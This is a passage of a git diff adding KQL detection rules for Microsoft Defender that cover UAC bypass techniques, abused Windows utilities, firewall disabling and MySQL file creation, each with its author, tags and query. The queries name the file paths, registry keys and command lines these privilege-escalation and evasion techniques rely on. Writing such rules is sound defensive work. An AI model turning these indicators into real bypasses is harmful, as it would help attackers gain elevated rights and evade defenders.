+1,10 @@ +// Title: UAC Bypass Using EventVwr +// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the pattern of a UAC bypass using Windows Event Viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation + +DeviceFileEvents +| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql new file mode 100644 index 00000000..58e853ed --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IEInstal - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql new file mode 100644 index 00000000..b753c6eb --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IEInstal - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql new file mode 100644 index 00000000..1f1e1bca --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Iscsicpl - ImageLoad +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-17 +// Level: high +// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceImageLoadEvents +| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql new file mode 100644 index 00000000..5584d8b8 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using MSConfig Token Modification - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql new file mode 100644 index 00000000..b775b5fa --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using MSConfig Token Modification - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql new file mode 100644 index 00000000..f206c78d --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using .NET Code Profiler on MMC +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql new file mode 100644 index 00000000..d728f4ad --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using NTFS Reparse Point - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql new file mode 100644 index 00000000..0b5ad53c --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using NTFS Reparse Point - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql new file mode 100644 index 00000000..049383b1 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using PkgMgr and DISM +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql new file mode 100644 index 00000000..15db9392 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Windows Media Player - File +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql new file mode 100644 index 00000000..2e3560fd --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Windows Media Player - Process +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")) and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql new file mode 100644 index 00000000..87e58977 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Windows Media Player - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql new file mode 100644 index 00000000..d3e1ed50 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass via Event Viewer +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects UAC bypass method using Windows event viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents +| where RegistryKey endswith "\\mscfile\\shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql new file mode 100644 index 00000000..1e0a1a80 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass via ICMLuaUtil +// Author: Florian Roth (Nextron Systems), Elastic (idea) +// Date: 2022-09-13 +// Level: high +// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql new file mode 100644 index 00000000..65b1bdbd --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass via Sdclt +// Author: Omer Yampel, Christian Burkard (Nextron Systems) +// Date: 2017-03-17 +// Level: high +// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents +| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql new file mode 100644 index 00000000..dac64381 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass via Windows Firewall Snap-In Hijack +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql new file mode 100644 index 00000000..bb229670 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Via Wsreset +// Author: oscd.community, Dmitry Uchakin +// Date: 2020-10-07 +// Level: high +// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql new file mode 100644 index 00000000..c2371ce2 --- /dev/null +++ b/KQL/rules/Defense Evasion/uac_bypass_wsreset.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass WSReset +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql new file mode 100644 index 00000000..94f1016a --- /dev/null +++ b/KQL/rules/Defense Evasion/ufw_force_stop_using_ufw_init.kql @@ -0,0 +1,12 @@ +// Title: Ufw Force Stop Using Ufw-Init +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-01-18 +// Level: medium +// Description: Detects attempts to force stop the ufw using ufw-init +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Network administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql new file mode 100644 index 00000000..b03e4751 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql @@ -0,0 +1,11 @@ +// Title: Uncommon AddinUtil.EXE CommandLine Execution +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql new file mode 100644 index 00000000..7b568e30 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql @@ -0,0 +1,12 @@ +// Title: Uncommon Assistive Technology Applications Execution Via AtBroker.EXE +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-12 +// Level: medium +// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate, non-default assistive technology applications execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql new file mode 100644 index 00000000..e48f2624 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql @@ -0,0 +1,11 @@ +// Title: Uncommon Child Process Of AddinUtil.EXE +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql new file mode 100644 index 00000000..74008bae --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql @@ -0,0 +1,14 @@ +// Title: Uncommon Child Process Of Appvlp.EXE +// Author: Sreeman +// Date: 2020-03-13 +// Level: medium +// Description: Detects uncommon child processes of Appvlp.EXE +Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. +Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder +or to mark a file as a system file. + +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion, attack.execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql new file mode 100644 index 00000000..b5a04ba0 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql @@ -0,0 +1,10 @@ +// Title: Uncommon Child Process Of Defaultpack.EXE +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218, attack.defense-evasion, attack.execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql new file mode 100644 index 00000000..6d60358e --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql @@ -0,0 +1,15 @@ +// Title: Uncommon Child Process Of Setres.EXE +// Author: @gott_cyber, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-11 +// Level: high +// Description: Detects uncommon child process of Setres.EXE. +Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. +It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1202 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath contains "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe") and (not((FolderPath endswith "C:\\Windows\\System32\\choice.exe" or FolderPath endswith "C:\\Windows\\SysWOW64\\choice.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql new file mode 100644 index 00000000..2299a635 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql @@ -0,0 +1,13 @@ +// Title: Uncommon Child Process Spawned By Odbcconf.EXE +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-05-22 +// Level: medium +// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process +// - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\odbcconf.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql new file mode 100644 index 00000000..c7f78337 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql @@ -0,0 +1,15 @@ +// Title: Uncommon Extension In Keyboard Layout IME File Registry Value +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-21 +// Level: high +// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. +Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql new file mode 100644 index 00000000..00504d88 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql @@ -0,0 +1,12 @@ +// Title: Uncommon File Creation By Mysql Daemon Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: high +// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. +Which could be an indicator of "User Defined Functions" abuse to download malware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql new file mode 100644 index 00000000..1a9de40f --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql @@ -0,0 +1,11 @@ +// Title: Uncommon FileSystem Load Attempt By Format.com +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. + +// MITRE Tactic: 